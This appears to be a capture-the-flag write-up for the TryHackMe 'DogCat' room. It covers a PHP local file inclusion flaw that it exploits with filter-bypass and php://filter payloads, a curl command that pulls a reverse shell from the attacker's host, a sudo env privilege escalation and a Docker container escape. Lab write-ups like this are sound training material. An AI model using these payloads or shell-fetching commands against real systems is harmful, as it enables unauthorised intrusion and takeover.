Skip to content

Latest commit

 

History

History
207 lines (103 loc) · 6.2 KB

DogCat.md

File metadata and controls

207 lines (103 loc) · 6.2 KB
Raw

DogCat TryHackMe

VIDEO WRITEUP

https://youtu.be/wnEVK7xIfcY

Enumeration

Nmap:

image

Seeing only SSH and HTTP open, it seems that it will be a web vulnerability

WhatWeb:

image

Web with Browser:

image

I click in dog and i see this:

image

In URL i see "view" parameter, It looks like LFI, let's try basic payloads

image

That message can mean two things.

Or they have protected the LFI website, Or the devoloper added filters so that an LFI cannot be executed so easily

Payloads:

../../../../etc/passwd = No Work

../../../../etc/passwd%00 = No Work

%252e%252e%252fetc%252fpasswd = No Work

%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00 = No Work

/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd = No Work

Wrappers:

Let's try with LFI Wrappers:

expect://whoami = No Work

php://filter/convert.base64-encode/resource=index.php = No work

Okey anything work, but i try to put cat or dog, it is possible that the filter checks if there is the word dog or cat.

Payload: dog/etc/passwd

image

That's It!!

Every time I click on cat or dog I get a different picture, that makes me think that it could be a php file that is executed.

But looking at the source code it is very clear to me.

Therefore, to check it is necessary to send a base64 filter in the wrapper and ask it to give me the page cat or dog.

image

WORKS!!! Lets go to Decode Base64 code

image

Same with dogs file

image

FFUF:

Web App are adding .php extension in all the querys.

image

Tryng Payloads I found the correct Payload

image

Decoded base64 index.php code

image

Other FFUF

image

Flag

image

image

Seeing index.php code• i see ext paramter expected in GET request.

http://10.10.64.213/?view=php://filter/convert.base64-encode/resource=dog/../flag&ext=.php == WORKS GOOD

http://10.10.24.8/?view=php://filter/convert.base64-encode/resource=dog/../../../../&ext=etc/passwd == WORKS GOOD!!!!!!!!

/etc/passwd

image

With /etc/hosts i can see this: Is Docker Container

image

RCE

It's moment to upload to Remote Code Execution

With this command:

image

I have RCE but it's impossible convert to shell.

I need upload my php reverse shell.

To upload i do the next steps

1. Configure the PHP File

image

2. Active Python HTTP Server

image

3. Download and Save shell with victim machine

curl -o shell.php 10.8.222.251:8000/shell.php

4. Activate your Listener

image

5. Open with browser Shell file

http://10.10.223.232/shell.php

And you have shell working

PrivEsc

sudo -l

ENV ROOT SHELL

I see this user can execute env command with sudo permisions

GTFOBINS

image

sudo /usr/bin/env /bin/bash

Root Shell

image

Flag 2 and 3

image

/opt/backups

I found this!!

image

image

tar -xvf backup.tar

BreakOut Container

image

image

image

And Wait...

image

Root Flag

image

DEMO:

https://youtu.be/wnEVK7xIfcY

Thanks!